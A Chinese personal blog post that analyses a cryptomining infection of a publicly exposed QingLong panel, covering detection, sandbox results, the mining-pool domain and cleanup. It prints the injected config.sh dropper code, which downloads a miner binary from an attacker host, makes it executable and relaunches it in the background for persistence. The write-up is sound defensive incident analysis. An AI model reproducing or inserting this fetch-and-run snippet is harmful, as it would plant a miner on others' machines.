七
日常记录

关于青龙面板被植入挖矿木马的分析

10 02月
作者:6912809|分类:网络安全

一次异常 CPU 占用的排查记录:青龙面板遭遇挖矿木马

一、异常的起因

事情发生在 2 月 7 日下午。当时我和老婆正在吃饭,突然注意到放在一旁的小主机(R5 5600G)风扇声音异常大,几乎是满速运转。

第一反应是有点不合理:

冬天室温不高,这台机器平时也不怎么满载,怎么会突然这么吵?

几分钟后,我在钉钉上收到了宝塔的告警通知:

dd3bc5e4c3a268de14ecec4ac16cfd46.jpg

服务器:宝塔 Linux 面板
IP 地址:192.168.9.22
发送时间:2026-02-07 19:02:54
通知类型:CPU 高占用告警
告警内容:最近 5 分钟内 CPU 平均占用率为 83.18%,高于告警值 80%

这基本确认了不是错觉,系统确实出现了异常负载

二、定位异常进程

登录服务器后第一时间查看进程情况,很快发现了一个极其异常的进程:

3f4ef29d3c3d9e9dfe9961389450ab98.jpg

1795937 root 20 0 2476464 2.3g 4 S 798.9 15.4 166:59.08 .fullgc

几个明显异常点:

  • 进程名:.fullgc(隐藏文件名)

  • CPU 占用:接近 800%(多核跑满)

  • 运行用户:root

  • 常驻运行

基本可以判定:

这不是正常服务进程,极大概率是恶意程序。

进一步确认该文件位置:

/ql/data/db/.fullgc

在完成本地排查并确认 .fullgc 进程行为异常后,为了进一步验证其性质,我将 /ql/data/db/.fullgc 文件上传至 微步在线(ThreatBook) 进行分析。

https://s.threatbook.com/report/file/a939048e4374176a6259a19da544423cdc838e532a978fbb2508fefea8e5c88a

d158b4ba-7ca1-4e0e-9e0c-9c779328f1f7.png

1️⃣ 文件基础信息

微步识别到该文件特征如下:

  • 文件类型:
    ELF 64-bit LSB executable(x86_64)

  • 编译方式:
    静态链接(statically linked)

  • 文件大小:
    2.93 MB

  • 首次提交时间:
    2026-02-07

  • 分析环境:
    Linux / Ubuntu 17.04 64bit

文件本身具备典型的 Linux 恶意程序特征:

静态编译 + 无符号信息 + 体积适中,便于跨发行版运行。

2️⃣ 威胁判定结果

微步给出的综合判定为:

  • 威胁等级:可疑

  • 木马家族:SusMiner

  • 引擎命中率:1 / 28

虽然命中率不高,但这是矿工类木马的常见特征

挖矿程序通常不会触发大量传统 AV 规则
更依赖 行为特征 而非特征码识别

3️⃣ 关键 IOC(威胁情报)

微步在分析过程中提取到了明确的恶意 IOC:

xmr.kryptex.network

  • 类型:Domain

  • 判定:恶意

  • 行为含义:
    👉 XMR(Monero)矿池通信域名

这与服务器上观测到的行为高度一致:

  • CPU 长时间满载

  • 多线程运行

  • 隐藏进程名

  • 后台常驻

4️⃣ 行为分析要点

微步行为检测中识别出多个高风险动作:

  • 使用 UPX 对程序进行压缩(规避检测)

  • 运行特征符合 XMRig 矿工程序

  • 存在网络通信行为

  • 持续消耗系统资源

这与我在服务器上观察到的现象形成了完整闭环

本地行为 + 脚本分析 + 第三方沙箱结果 = 挖矿木马实锤


三、确认存在持久化机制

我尝试直接重启服务器,结果发现:

  • 系统刚启动

  • .fullgc 进程立刻重新出现

这说明它并不是临时启动的,而是被写入了某个启动 / 守护脚本

结合路径 /ql/data/db/,第一时间怀疑的是 青龙面板(QingLong)相关组件被植入了恶意代码

四、排查植入点:config.sh 被篡改

通过 grep 排查青龙相关脚本后,在 config.sh 中发现了被植入的恶意启动代码(节选):

d="${QL_DIR:-/ql}/data/db"
b="$d/.fullgc"

case "$(uname -s)-$(uname -m)" in
  Linux-x86_64|Linux-amd64)
    u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64"
    ;;
  Linux-aarch64|Linux-arm64)
    u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64"
    ;;
  Darwin-x86_64)
    u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64"
    ;;
  Darwin-arm64)
    u="https://file.551911.xyz/fullgc/fullgc-macos-arm64"
    ;;
esac

[ -n "$u" ] && [ ! -f "$b" ] && {
  curl -fsSL -o "$b" "$u" || wget -qO "$b" "$u"
}
chmod +x "$b"

[ -f "$b" ] && ! ps -ef | grep -v grep | grep -qF ".fullgc" \
  && nohup "$b" >/dev/null 2>&1 &

这段代码的行为非常明确:

  • 根据系统架构下载对应的 .fullgc 二进制

  • 写入 /ql/data/db/

  • 赋予执行权限

  • 若未运行则后台 nohup 启动

  • 实现持久化 + 自拉起

典型的挖矿木马行为。

五、影响范围判断

在进一步排查后发现一个明显规律:

  • 开启公网 IPv4 访问的服务器:全部被植入

  • 未暴露公网 IPv4 的服务器:完全正常

这几乎可以确认:

攻击入口来自公网暴露的服务
并非误操作或内部脚本问题

六、社区验证:并非个例

2 月 9 日(周一),我在青龙官方仓库中看到已有用户反馈类似问题:

🔗 https://github.com/whyour/qinglong/issues/2923

这进一步确认了这不是单一环境问题,而是已有攻击者在针对青龙面板进行扫描和利用

七、处理与结果

采取的处理措施:

  1. 删除恶意文件

    /ql/data/db/.fullgc

  2. 清理被植入的 config.sh

  3. 关闭公网 IPv4 的所有访问入口

  4. 暂时不对外暴露任何管理服务

处理完成后:

  • 连续观察 2 天

  • CPU 占用恢复正常

  • 未再发现 .fullgc 或异常进程

  • 系统运行稳定

八、总结

这次事件的核心教训非常明确:

  • 管理面板暴露公网 = 高风险

  • 青龙本身不是问题,但公网暴露 + 弱防护一定会被扫

  • 隐藏进程名 + 自启动 + 高 CPU,占用 = 典型挖矿木马特征

如果你的服务器上有类似现象,第一时间检查:

  • /ql/data/db/

  • config.sh

  • 是否存在 .fullgc.xmrig 等隐藏可执行文件


打赏
浏览186 评论0
返回
目录 返回
首页

除特别注明外,本站所有文章均为七原创,转载请注明出处来自https://www.qxhut.cn/?id=52

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络收集整理,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序和内容,请支持正版,购买注册,得到更好的正版服务。我们非常重视版权问题,如有侵权请邮件与我们联系处理。敬请谅解!

公共DNS服务器

发表评论